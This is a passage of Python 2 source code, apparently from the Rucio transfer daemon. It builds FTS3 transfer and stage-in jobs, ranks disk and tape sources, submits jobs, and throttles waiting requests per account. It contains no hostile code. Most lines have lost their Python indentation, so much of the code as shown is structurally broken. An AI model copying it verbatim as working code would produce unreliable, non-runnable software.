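# slices as its use above implies): `chunks` is what caps every submitted
# FTS job at `group_bulk` files, e.g. 5 files with group_bulk=2 become
# jobs of sizes 2, 2 and 1.
def _example_group_bulk_sizes():
    return [len(piece) for piece in chunks(list(range(5)), 2)]  # -> [2, 2, 1]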
@read_session
def get_unavailable_read_rse_ids(session=None):
key = 'unavailable_read_rse_ids'
result = REGION_SHORT.get(key)
    if isinstance(result, NoValue):
try:
logging.debug("Refresh unavailable read rses")
unavailable_read_rses = rse_core.list_rses(filters={'availability_read': False}, session=session)
unavailable_read_rse_ids = [r['id'] for r in unavailable_read_rses]
REGION_SHORT.set(key, unavailable_read_rse_ids)
return unavailable_read_rse_ids
except:
logging.warning("Failed to refresh unavailable read rses, error: %s" % (traceback.format_exc()))
return []
return result
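# Caching sketch (generic restatement, `key` and `loader` are
# placeholders): a dogpile region returns a NoValue sentinel on a miss, so
# the read-through pattern above is "get, test for NoValue, compute, set".
def _example_read_through_cache(key, loader):
    value = REGION_SHORT.get(key)
    if isinstance(value, NoValue):
        value = loader()
        REGION_SHORT.set(key, value)
    return value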
@read_session
def get_transfer_requests_and_source_replicas(process=None, total_processes=None, thread=None, total_threads=None,
limit=None, activity=None, older_than=None, rses=None, schemes=None,
bring_online=43200, retry_other_fts=False, failover_schemes=None, session=None):
req_sources = request.list_transfer_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, session=session)
unavailable_read_rse_ids = get_unavailable_read_rse_ids(session=session)
bring_online_local = bring_online
transfers, rses_info, protocols, rse_attrs, reqs_no_source, reqs_only_tape_source, reqs_scheme_mismatch = {}, {}, {}, {}, [], [], []
for id, rule_id, scope, name, md5, adler32, bytes, activity, attributes, previous_attempt_id, dest_rse_id, source_rse_id, rse, deterministic, rse_type, path, retry_count, src_url, ranking, link_ranking in req_sources:
transfer_src_type = "DISK"
transfer_dst_type = "DISK"
allow_tape_source = True
try:
if rses and dest_rse_id not in rses:
continue
current_schemes = schemes
if previous_attempt_id and failover_schemes:
current_schemes = failover_schemes
if id not in transfers:
if id not in reqs_no_source:
reqs_no_source.append(id)
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
if source_rse_id is None or rse is None:
continue
if link_ranking is None:
logging.debug("Request %s: no link from %s to %s" % (id, source_rse_id, dest_rse_id))
continue
if source_rse_id in unavailable_read_rse_ids:
continue
# Get destination rse information and protocol
if dest_rse_id not in rses_info:
dest_rse = rse_core.get_rse_name(rse_id=dest_rse_id, session=session)
rses_info[dest_rse_id] = rsemgr.get_rse_info(dest_rse, session=session)
if dest_rse_id not in rse_attrs:
rse_attrs[dest_rse_id] = get_rse_attributes(dest_rse_id, session=session)
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# parse source expression
source_replica_expression = attr["source_replica_expression"] if (attr and "source_replica_expression" in attr) else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
                # parse allow tape source expression, not the final version.
# allow_tape_source = attr["allow_tape_source"] if (attr and "allow_tape_source" in attr) else True
allow_tape_source = True
# Get protocol
if dest_rse_id not in protocols:
try:
protocols[dest_rse_id] = rsemgr.create_protocol(rses_info[dest_rse_id], 'write', current_schemes)
except RSEProtocolNotSupported:
logging.error('Operation "write" not supported by %s with schemes %s' % (rses_info[dest_rse_id]['rse'], current_schemes))
if id in reqs_no_source:
reqs_no_source.remove(id)
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
# get dest space token
dest_spacetoken = None
if protocols[dest_rse_id].attributes and \
'extended_attributes' in protocols[dest_rse_id].attributes and \
protocols[dest_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[dest_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[dest_rse_id].attributes['extended_attributes']['space_token']
# Compute the destination url
if rses_info[dest_rse_id]['deterministic']:
dest_url = protocols[dest_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name}).values()[0]
else:
# compute dest url in case of non deterministic
# naming convention, etc.
dsn = 'other'
if attr and 'ds_name' in attr:
dsn = attr["ds_name"]
else:
# select a containing dataset
for parent in did.list_parent_dids(scope, name):
if parent['type'] == DIDType.DATASET:
dsn = parent['name']
break
# DQ2 path always starts with /, but prefix might not end with /
naming_convention = rse_attrs[dest_rse_id].get('naming_convention', None)
dest_path = construct_surl(dsn, name, naming_convention)
if rses_info[dest_rse_id]['rse_type'] == RSEType.TAPE or rses_info[dest_rse_id]['rse_type'] == 'TAPE':
if retry_count or activity == 'Recovery':
dest_path = '%s_%i' % (dest_path, int(time.time()))
dest_url = protocols[dest_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': dest_path}).values()[0]
# get allowed source scheme
src_schemes = []
dest_scheme = dest_url.split("://")[0]
if dest_scheme in ['srm', 'gsiftp']:
src_schemes = ['srm', 'gsiftp']
else:
src_schemes = [dest_scheme]
# Compute the sources: urls, etc
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
# Get protocol
source_rse_id_key = '%s_%s' % (source_rse_id, '_'.join(src_schemes))
if source_rse_id_key not in protocols:
try:
protocols[source_rse_id_key] = rsemgr.create_protocol(rses_info[source_rse_id], 'read', src_schemes)
except RSEProtocolNotSupported:
logging.error('Operation "read" not supported by %s with schemes %s' % (rses_info[source_rse_id]['rse'], src_schemes))
if id in reqs_no_source:
reqs_no_source.remove(id)
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
source_url = protocols[source_rse_id_key].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
# Extend the metadata dictionary with request attributes
overwrite, bring_online = True, None
if rses_info[source_rse_id]['rse_type'] == RSEType.TAPE or rses_info[source_rse_id]['rse_type'] == 'TAPE':
bring_online = bring_online_local
transfer_src_type = "TAPE"
if not allow_tape_source:
if id not in reqs_only_tape_source:
reqs_only_tape_source.append(id)
if id in reqs_no_source:
reqs_no_source.remove(id)
continue
if rses_info[dest_rse_id]['rse_type'] == RSEType.TAPE or rses_info[dest_rse_id]['rse_type'] == 'TAPE':
overwrite = False
transfer_dst_type = "TAPE"
# get external_host
fts_hosts = rse_attrs[dest_rse_id].get('fts', None)
if not fts_hosts:
logging.error('Source RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse, id))
continue
if retry_count is None:
retry_count = 0
fts_list = fts_hosts.split(",")
external_host = fts_list[0]
if retry_other_fts:
external_host = fts_list[retry_count % len(fts_list)]
if id in reqs_no_source:
reqs_no_source.remove(id)
if id in reqs_only_tape_source:
reqs_only_tape_source.remove(id)
file_metadata = {'request_id': id,
'scope': scope,
'name': name,
'activity': activity,
'request_type': str(RequestType.TRANSFER).lower(),
'src_type': transfer_src_type,
'dst_type': transfer_dst_type,
'src_rse': rse,
'dst_rse': rses_info[dest_rse_id]['rse'],
'src_rse_id': source_rse_id,
'dest_rse_id': dest_rse_id,
'filesize': bytes,
'md5': md5,
'adler32': adler32,
'verify_checksum': rse_attrs[dest_rse_id].get('verify_checksum', True)}
if previous_attempt_id:
file_metadata['previous_attempt_id'] = previous_attempt_id
transfers[id] = {'request_id': id,
'schemes': src_schemes,
# 'src_urls': [source_url],
'sources': [(rse, source_url, source_rse_id, ranking if ranking is not None else 0, link_ranking)],
'dest_urls': [dest_url],
'src_spacetoken': None,
'dest_spacetoken': dest_spacetoken,
'overwrite': overwrite,
'bring_online': bring_online,
'copy_pin_lifetime': attr.get('lifetime', -1),
'external_host': external_host,
'selection_strategy': 'auto',
'rule_id': rule_id,
'file_metadata': file_metadata}
else:
schemes = transfers[id]['schemes']
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
if source_rse_id is None or rse is None:
continue
if link_ranking is None:
logging.debug("Request %s: no link from %s to %s" % (id, source_rse_id, dest_rse_id))
continue
if source_rse_id in unavailable_read_rse_ids:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# parse source expression
source_replica_expression = attr["source_replica_expression"] if (attr and "source_replica_expression" in attr) else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
                # parse allow tape source expression, not the final version.
allow_tape_source = attr["allow_tape_source"] if (attr and "allow_tape_source" in attr) else True
# Compute the sources: urls, etc
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if ranking is None:
ranking = 0
                # TAPE should not be mixed with DISK and should not be used as a first try
                # If there is a source whose ranking is no less than the TAPE ranking, TAPE will not be used.
if rses_info[source_rse_id]['rse_type'] == RSEType.TAPE or rses_info[source_rse_id]['rse_type'] == 'TAPE':
# current src_rse is Tape
if not allow_tape_source:
continue
if not transfers[id]['bring_online']:
                        # the sources already found are disks.
avail_top_ranking = None
founded_sources = transfers[id]['sources']
for founded_source in founded_sources:
if avail_top_ranking is None:
avail_top_ranking = founded_source[3]
continue
if founded_source[3] is not None and founded_source[3] > avail_top_ranking:
avail_top_ranking = founded_source[3]
if avail_top_ranking >= ranking:
# current Tape source is not the highest ranking, will use disk sources
continue
else:
transfers[id]['sources'] = []
transfers[id]['bring_online'] = bring_online_local
transfer_src_type = "TAPE"
transfers[id]['file_metadata']['src_type'] = transfer_src_type
transfers[id]['file_metadata']['src_rse'] = rse
else:
                        # the sources already found are Tape too.
                        # multiple Tape source replicas are not allowed in FTS3.
if transfers[id]['sources'][0][3] > ranking or (transfers[id]['sources'][0][3] == ranking and transfers[id]['sources'][0][4] >= link_ranking):
continue
else:
transfers[id]['sources'] = []
transfers[id]['bring_online'] = bring_online_local
transfers[id]['file_metadata']['src_rse'] = rse
else:
# current src_rse is Disk
if transfers[id]['bring_online']:
                        # the sources found so far are Tape
avail_top_ranking = None
founded_sources = transfers[id]['sources']
for founded_source in founded_sources:
if avail_top_ranking is None:
avail_top_ranking = founded_source[3]
continue
if founded_source[3] is not None and founded_source[3] > avail_top_ranking:
avail_top_ranking = founded_source[3]
if ranking >= avail_top_ranking:
                            # current disk replica has higher ranking than the found sources
                            # remove the found Tape sources
transfers[id]['sources'] = []
transfers[id]['bring_online'] = None
transfer_src_type = "DISK"
transfers[id]['file_metadata']['src_type'] = transfer_src_type
transfers[id]['file_metadata']['src_rse'] = rse
else:
continue
# Get protocol
source_rse_id_key = '%s_%s' % (source_rse_id, '_'.join(schemes))
if source_rse_id_key not in protocols:
try:
protocols[source_rse_id_key] = rsemgr.create_protocol(rses_info[source_rse_id], 'read', schemes)
except RSEProtocolNotSupported:
logging.error('Operation "read" not supported by %s with schemes %s' % (rses_info[source_rse_id]['rse'], schemes))
if id not in reqs_scheme_mismatch:
reqs_scheme_mismatch.append(id)
continue
source_url = protocols[source_rse_id_key].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
# transfers[id]['src_urls'].append((source_rse_id, source_url))
transfers[id]['sources'].append((rse, source_url, source_rse_id, ranking, link_ranking))
except:
logging.critical("Exception happened when trying to get transfer for request %s: %s" % (id, traceback.format_exc()))
break
return transfers, reqs_no_source, reqs_scheme_mismatch, reqs_only_tape_source
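# Preference sketch (condensed restatement of the loop above): when one
# request accumulates both DISK and TAPE sources, DISK wins ties; a TAPE
# replica displaces DISK replicas only with a strictly higher ranking, and
# at most one TAPE source survives because FTS3 rejects jobs with multiple
# tape replicas.
def _example_keep_disk_or_tape(disk_ranking, tape_ranking):
    return 'DISK' if disk_ranking >= tape_ranking else 'TAPE'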
@read_session
def get_stagein_requests_and_source_replicas(process=None, total_processes=None, thread=None, total_threads=None, failover_schemes=None,
limit=None, activity=None, older_than=None, rses=None, mock=False, schemes=None,
bring_online=43200, retry_other_fts=False, session=None):
req_sources = request.list_stagein_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, session=session)
transfers, rses_info, protocols, rse_attrs, reqs_no_source = {}, {}, {}, {}, []
for id, rule_id, scope, name, md5, adler32, bytes, activity, attributes, dest_rse_id, source_rse_id, rse, deterministic, rse_type, path, staging_buffer, retry_count, previous_attempt_id, src_url, ranking in req_sources:
try:
if rses and dest_rse_id not in rses:
continue
current_schemes = schemes
if previous_attempt_id and failover_schemes:
current_schemes = failover_schemes
if id not in transfers:
if id not in reqs_no_source:
reqs_no_source.append(id)
if not src_url:
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
# staging_buffer will be None if rse has no key 'staging_buffer'
if source_rse_id is None or rse is None or staging_buffer is None:
continue
# Get destination rse information and protocol
if dest_rse_id not in rses_info:
dest_rse = rse_core.get_rse_name(rse_id=dest_rse_id, session=session)
rses_info[dest_rse_id] = rsemgr.get_rse_info(dest_rse, session=session)
if staging_buffer != rses_info[dest_rse_id]['rse']:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
source_replica_expression = attr["source_replica_expression"] if "source_replica_expression" in attr else None
if source_replica_expression:
try:
parsed_rses = parse_expression(source_replica_expression, session=session)
except InvalidRSEExpression, e:
logging.error("Invalid RSE exception %s: %s" % (source_replica_expression, e))
continue
else:
allowed_rses = [x['rse'] for x in parsed_rses]
if rse not in allowed_rses:
continue
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if source_rse_id not in rse_attrs:
rse_attrs[source_rse_id] = get_rse_attributes(source_rse_id, session=session)
if source_rse_id not in protocols:
protocols[source_rse_id] = rsemgr.create_protocol(rses_info[source_rse_id], 'write', current_schemes)
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocols[source_rse_id].attributes and \
'extended_attributes' in protocols[source_rse_id].attributes and \
protocols[source_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[source_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[source_rse_id].attributes['extended_attributes']['space_token']
source_url = protocols[source_rse_id].lfns2pfns(lfns={'scope': scope, 'name': name, 'path': path}).values()[0]
else:
# source_rse_id will be None if no source replicas
# rse will be None if rse is staging area
# staging_buffer will be None if rse has no key 'staging_buffer'
if source_rse_id is None or rse is None or staging_buffer is None:
continue
attr = None
if attributes:
if type(attributes) is dict:
attr = json.loads(json.dumps(attributes))
else:
attr = json.loads(str(attributes))
# to get space token and fts attribute
if source_rse_id not in rses_info:
# source_rse = rse_core.get_rse_name(rse_id=source_rse_id, session=session)
source_rse = rse
rses_info[source_rse_id] = rsemgr.get_rse_info(source_rse, session=session)
if source_rse_id not in rse_attrs:
rse_attrs[source_rse_id] = get_rse_attributes(source_rse_id, session=session)
if source_rse_id not in protocols:
protocols[source_rse_id] = rsemgr.create_protocol(rses_info[source_rse_id], 'write', current_schemes)
# we need to set the spacetoken if we use SRM
dest_spacetoken = None
if protocols[source_rse_id].attributes and \
'extended_attributes' in protocols[source_rse_id].attributes and \
protocols[source_rse_id].attributes['extended_attributes'] and \
'space_token' in protocols[source_rse_id].attributes['extended_attributes']:
dest_spacetoken = protocols[source_rse_id].attributes['extended_attributes']['space_token']
source_url = src_url
fts_hosts = rse_attrs[source_rse_id].get('fts', None)
if not fts_hosts:
logging.error('Source RSE %s FTS attribute not defined - SKIP REQUEST %s' % (rse, id))
continue
if not retry_count:
retry_count = 0
fts_list = fts_hosts.split(",")
external_host = fts_list[0]
if retry_other_fts:
external_host = fts_list[retry_count % len(fts_list)]
if id in reqs_no_source:
reqs_no_source.remove(id)
file_metadata = {'request_id': id,
'scope': scope,
'name': name,
'activity': activity,
'request_type': str(RequestType.STAGEIN).lower(),
'src_type': "TAPE",
'dst_type': "DISK",
'src_rse': rse,
'dst_rse': rse,
'src_rse_id': source_rse_id,
'dest_rse_id': dest_rse_id,
'filesize': bytes,
'md5': md5,
'adler32': adler32}
if previous_attempt_id:
file_metadata['previous_attempt_id'] = previous_attempt_id
transfers[id] = {'request_id': id,
# 'src_urls': [source_url],
'sources': [(rse, source_url, source_rse_id, ranking)],
'dest_urls': [source_url],
'src_spacetoken': None,
'dest_spacetoken': dest_spacetoken,
'overwrite': False,
'bring_online': bring_online,
'copy_pin_lifetime': attr.get('lifetime', -1) if attr else -1,
'external_host': external_host,
'selection_strategy': 'auto',
'rule_id': rule_id,
'file_metadata': file_metadata}
logging.debug("Transfer for request(%s): %s" % (id, transfers[id]))
except:
logging.critical("Exception happened when trying to get transfer for request %s: %s" % (id, traceback.format_exc()))
break
return transfers, reqs_no_source
def get_stagein_transfers(process=None, total_processes=None, thread=None, total_threads=None, failover_schemes=None,
limit=None, activity=None, older_than=None, rses=None, mock=False, schemes=None, bring_online=43200, retry_other_fts=False, session=None):
transfers, reqs_no_source = get_stagein_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, mock=mock, schemes=schemes,
bring_online=bring_online, retry_other_fts=retry_other_fts, failover_schemes=failover_schemes,
session=session)
request.set_requests_state(reqs_no_source, RequestState.NO_SOURCES)
return transfers
def handle_requests_with_scheme_mismatch(transfers=None, reqs_scheme_mismatch=None, schemes=None):
if not reqs_scheme_mismatch:
return transfers
for request_id in reqs_scheme_mismatch:
logging.debug("Request %s with schemes %s has mismatched sources, will handle it" % (request_id, schemes))
found_avail_source = 0
if request_id in transfers:
for source in transfers[request_id]['sources']:
ranking = source[3]
if ranking >= 0:
                    # if ranking is less than 0, the source already failed at least once.
found_avail_source = 1
break
if not found_avail_source:
# todo
# try to force scheme to regenerate the dest_url and src_url
# transfer = get_transfer_from_request_id(request_id, scheme='srm') # if rsemgr can select protocol by order, we can change
# if transfer:
# transfers[request_id] = transfer
pass
return transfers
def mock_sources(sources):
tmp_sources = []
for s in sources:
tmp_sources.append((s[0], ':'.join(['mock'] + s[1].split(':')[1:]), s[2], s[3]))
    return tmp_sources
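# Rewrite sketch (invented tuple): only the URL scheme is swapped for
# 'mock', everything after the first colon is preserved, e.g.
# ('RSE', 'gsiftp://host/f', 1, 0) -> ('RSE', 'mock://host/f', 1, 0).
def _example_mock_sources():
    return mock_sources([('MOCK_DISK', 'gsiftp://mock.example.org/f', 1, 0)])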
def sort_link_ranking(sources):
rank_sources = {}
ret_sources = []
for source in sources:
rse, source_url, source_rse_id, ranking, link_ranking = source
if link_ranking not in rank_sources:
rank_sources[link_ranking] = []
rank_sources[link_ranking].append(source)
rank_keys = rank_sources.keys()
rank_keys.sort(reverse=True)
for rank_key in rank_keys:
sources_list = rank_sources[rank_key]
random.shuffle(sources_list)
ret_sources = ret_sources + sources_list
return ret_sources
def sort_ranking(sources):
logging.debug("Sources before sorting: %s" % sources)
rank_sources = {}
ret_sources = []
for source in sources:
        # ranking comes from the sources table and counts the retries
        # link_ranking comes from the distances table and is the link rank
        # link_ranking should not be None (None means no link; the source will not be used)
rse, source_url, source_rse_id, ranking, link_ranking = source
if ranking is None:
ranking = 0
if ranking not in rank_sources:
rank_sources[ranking] = []
rank_sources[ranking].append(source)
rank_keys = rank_sources.keys()
rank_keys.sort(reverse=True)
for rank_key in rank_keys:
sources_list = sort_link_ranking(rank_sources[rank_key])
ret_sources = ret_sources + sources_list
logging.debug("Sources after sorting: %s" % ret_sources)
return ret_sources
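# Ordering sketch (invented 5-tuples): `sort_ranking` orders by ranking
# descending, then by link_ranking descending within equal rank, shuffling
# exact ties; here 'B' sorts first (rank 1), then 'C' (link rank 3), then
# 'A' (link rank 2).
def _example_sort_ranking():
    sources = [('A', 'mock://a/f', 1, 0, 2),
               ('B', 'mock://b/f', 2, 1, 1),
               ('C', 'mock://c/f', 3, None, 3)]
    return sort_ranking(sources)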
def get_transfers(process=None, total_processes=None, thread=None, total_threads=None,
failover_schemes=None, limit=None, activity=None, older_than=None,
rses=None, schemes=None, mock=False, max_sources=4, bring_online=43200,
retry_other_fts=False, session=None):
transfers, reqs_no_source, reqs_scheme_mismatch, reqs_only_tape_source = get_transfer_requests_and_source_replicas(process=process, total_processes=total_processes, thread=thread, total_threads=total_threads,
limit=limit, activity=activity, older_than=older_than, rses=rses, schemes=schemes,
bring_online=bring_online, retry_other_fts=retry_other_fts,
failover_schemes=failover_schemes, session=session)
request.set_requests_state(reqs_no_source, RequestState.NO_SOURCES)
request.set_requests_state(reqs_only_tape_source, RequestState.ONLY_TAPE_SOURCES)
request.set_requests_state(reqs_scheme_mismatch, RequestState.MISMATCH_SCHEME)
for request_id in transfers:
sources = transfers[request_id]['sources']
sources = sort_ranking(sources)
if len(sources) > max_sources:
sources = sources[:max_sources]
if not mock:
transfers[request_id]['sources'] = sources
else:
transfers[request_id]['sources'] = mock_sources(sources)
# remove link_ranking in the final sources
sources = transfers[request_id]['sources']
transfers[request_id]['sources'] = []
for source in sources:
rse, source_url, source_rse_id, ranking, link_ranking = source
transfers[request_id]['sources'].append((rse, source_url, source_rse_id, ranking))
transfers[request_id]['file_metadata']['src_rse'] = sources[0][0]
transfers[request_id]['file_metadata']['src_rse_id'] = sources[0][2]
logging.debug("Transfer for request(%s): %s" % (request_id, transfers[request_id]))
return transfers
def submit_transfer(external_host, job, submitter='submitter', cachedir=None, process=0, thread=0, timeout=None):
# prepare submitting
xfers_ret = {}
try:
for file in job['files']:
file_metadata = file['metadata']
request_id = file_metadata['request_id']
log_str = '%s:%s PREPARING REQUEST %s DID %s:%s TO SUBMITTING STATE PREVIOUS %s FROM %s TO %s USING %s ' % (process, thread,
file_metadata['request_id'],
file_metadata['scope'],
file_metadata['name'],
file_metadata['previous_attempt_id'] if 'previous_attempt_id' in file_metadata else None,
file['sources'],
file['destinations'],
external_host)
xfers_ret[request_id] = {'state': RequestState.SUBMITTING, 'external_host': external_host, 'external_id': None, 'dest_url': file['destinations'][0]}
logging.info("%s" % (log_str))
xfers_ret[request_id]['file'] = file
logging.debug("%s:%s start to prepare transfer" % (process, thread))
request.prepare_request_transfers(xfers_ret)
logging.debug("%s:%s finished to prepare transfer" % (process, thread))
except:
logging.error("%s:%s Failed to prepare requests %s state to SUBMITTING(Will not submit jobs but return directly) with error: %s" % (process, thread, xfers_ret.keys(), traceback.format_exc()))
return
# submit the job
eid = None
try:
ts = time.time()
logging.info("%s:%s About to submit job to %s with timeout %s" % (process, thread, external_host, timeout))
eid = request.submit_bulk_transfers(external_host, files=job['files'], transfertool='fts3', job_params=job['job_params'], timeout=timeout)
duration = time.time() - ts
logging.info("%s:%s Submit job %s to %s in %s seconds" % (process, thread, eid, external_host, duration))
record_timer('daemons.conveyor.%s.submit_bulk_transfer.per_file' % submitter, (time.time() - ts) * 1000 / len(job['files']))
record_counter('daemons.conveyor.%s.submit_bulk_transfer' % submitter, len(job['files']))
record_timer('daemons.conveyor.%s.submit_bulk_transfer.files' % submitter, len(job['files']))
except Exception, ex:
logging.error("Failed to submit a job with error %s: %s" % (str(ex), traceback.format_exc()))
# register transfer
xfers_ret = {}
try:
for file in job['files']:
file_metadata = file['metadata']
request_id = file_metadata['request_id']
log_str = '%s:%s COPYING REQUEST %s DID %s:%s USING %s' % (process, thread, file_metadata['request_id'], file_metadata['scope'], file_metadata['name'], external_host)
if eid:
xfers_ret[request_id] = {'scope': file_metadata['scope'],
'name': file_metadata['name'],
'state': RequestState.SUBMITTED,
'external_host': external_host,
'external_id': eid,
'request_type': file.get('request_type', None),
'dst_rse': file_metadata.get('dst_rse', None),
'src_rse': file_metadata.get('src_rse', None),
'src_rse_id': file_metadata['src_rse_id'],
'metadata': file_metadata}
log_str += 'with state(%s) with eid(%s)' % (RequestState.SUBMITTED, eid)
logging.info("%s" % (log_str))
else:
xfers_ret[request_id] = {'scope': file_metadata['scope'],
'name': file_metadata['name'],
'state': RequestState.SUBMISSION_FAILED,
'external_host': external_host,
'external_id': None,
'request_type': file.get('request_type', None),
'dst_rse': file_metadata.get('dst_rse', None),
'src_rse': file_metadata.get('src_rse', None),
'src_rse_id': file_metadata['src_rse_id'],
'metadata': file_metadata}
log_str += 'with state(%s) with eid(%s)' % (RequestState.SUBMISSION_FAILED, None)
logging.warn("%s" % (log_str))
logging.debug("%s:%s start to register transfer state" % (process, thread))
request.set_request_transfers_state(xfers_ret, datetime.datetime.utcnow())
logging.debug("%s:%s finished to register transfer state" % (process, thread))
except:
logging.error("%s:%s Failed to register transfer state with error: %s" % (process, thread, traceback.format_exc()))
try:
if eid:
logging.info("%s:%s Cancel transfer %s on %s" % (process, thread, eid, external_host))
request.cancel_request_external_id(eid, external_host)
except:
logging.error("%s:%s Failed to cancel transfers %s on %s with error: %s" % (process, thread, eid, external_host, traceback.format_exc()))


def schedule_requests():
    try:
        logging.info("Throttler retrieving request statistics")
        results = request.get_stats_by_activity_dest_state(state=[RequestState.QUEUED, RequestState.SUBMITTING, RequestState.SUBMITTED, RequestState.WAITING])
        result_dict = {}
        for activity, dest_rse_id, account, state, counter in results:
            threshold = request.get_config_limit(activity, dest_rse_id)

            if threshold or (counter and (state == RequestState.WAITING)):
                if activity not in result_dict:
                    result_dict[activity] = {}
                if dest_rse_id not in result_dict[activity]:
                    result_dict[activity][dest_rse_id] = {'waiting': 0, 'transfer': 0, 'threshold': threshold, 'accounts': {}}
                if account not in result_dict[activity][dest_rse_id]['accounts']:
                    result_dict[activity][dest_rse_id]['accounts'][account] = {'waiting': 0, 'transfer': 0}
                if state == RequestState.WAITING:
                    result_dict[activity][dest_rse_id]['accounts'][account]['waiting'] += counter
                    result_dict[activity][dest_rse_id]['waiting'] += counter
                else:
                    result_dict[activity][dest_rse_id]['accounts'][account]['transfer'] += counter
                    result_dict[activity][dest_rse_id]['transfer'] += counter

        for activity in result_dict:
            for dest_rse_id in result_dict[activity]:
                threshold = result_dict[activity][dest_rse_id]['threshold']
                transfer = result_dict[activity][dest_rse_id]['transfer']
                waiting = result_dict[activity][dest_rse_id]['waiting']
                logging.debug("Request status for %s at %s: %s" % (activity, dest_rse_id, result_dict[activity][dest_rse_id]))
                if threshold is None:
                    logging.debug("Throttler remove limits (threshold: %s) and release all waiting requests for activity %s, rse_id %s" % (threshold, activity, dest_rse_id))
                    rse_core.delete_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id)
                    request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id)
                    rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
                    record_counter('daemons.conveyor.throttler.delete_rse_transfer_limits.%s.%s' % (activity, rse_name))
                elif transfer + waiting > threshold:
                    logging.debug("Throttler set limits for activity %s, rse_id %s" % (activity, dest_rse_id))
                    rse_core.set_rse_transfer_limits(rse=None, activity=activity, rse_id=dest_rse_id, max_transfers=threshold, transfers=transfer, waitings=waiting)
                    rse_name = rse_core.get_rse_name(rse_id=dest_rse_id)
                    record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.max_transfers' % (activity, rse_name), threshold)
                    record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.transfers' % (activity, rse_name), transfer)
                    record_gauge('daemons.conveyor.throttler.set_rse_transfer_limits.%s.%s.waitings' % (activity, rse_name), waiting)
                    if transfer < 0.8 * threshold:
                        # release waiting requests, distributing the release budget across accounts
                        nr_accounts = len(result_dict[activity][dest_rse_id]['accounts'])
                        if nr_accounts < 1:
                            nr_accounts = 1
                        to_release = threshold - transfer
                        threshold_per_account = math.ceil(float(threshold) / nr_accounts)
                        to_release_per_account = math.ceil(float(to_release) / nr_accounts)
                        accounts = result_dict[activity][dest_rse_id]['accounts']
                        for account in accounts:
                            if nr_accounts == 1:
                                logging.debug("Throttler release %s waiting requests for activity %s, rse_id %s, account %s" % (to_release, activity, dest_rse_id, account))
                                request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=to_release)
                                record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), to_release)
                            elif accounts[account]['transfer'] > threshold_per_account:
                                logging.debug("Throttler will not release waiting requests for activity %s, rse_id %s, account %s: it queued more transfers than its share" %
                                              (activity, dest_rse_id, account))
                                nr_accounts -= 1
                                to_release_per_account = math.ceil(float(to_release) / nr_accounts)
                            elif accounts[account]['waiting'] < to_release_per_account:
                                logging.debug("Throttler release %s waiting requests for activity %s, rse_id %s, account %s" % (accounts[account]['waiting'], activity, dest_rse_id, account))
                                request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=accounts[account]['waiting'])
                                record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), accounts[account]['waiting'])
                                to_release = to_release - accounts[account]['waiting']
                                nr_accounts -= 1
                                to_release_per_account = math.ceil(float(to_release) / nr_accounts)
                            else:
                                logging.debug("Throttler release %s waiting requests for activity %s, rse_id %s, account %s" % (to_release_per_account, activity, dest_rse_id, account))
                                request.release_waiting_requests(rse=None, activity=activity, rse_id=dest_rse_id, account=account, count=to_release_per_account)
                                record_gauge('daemons.conveyor.throttler.release_waiting_requests.%s.%s.%s' % (activity, rse_name, account), to_release_per_account)
                                to_release = to_release - to_release_per_account
                                nr_accounts -= 1
                elif waiting > 0:
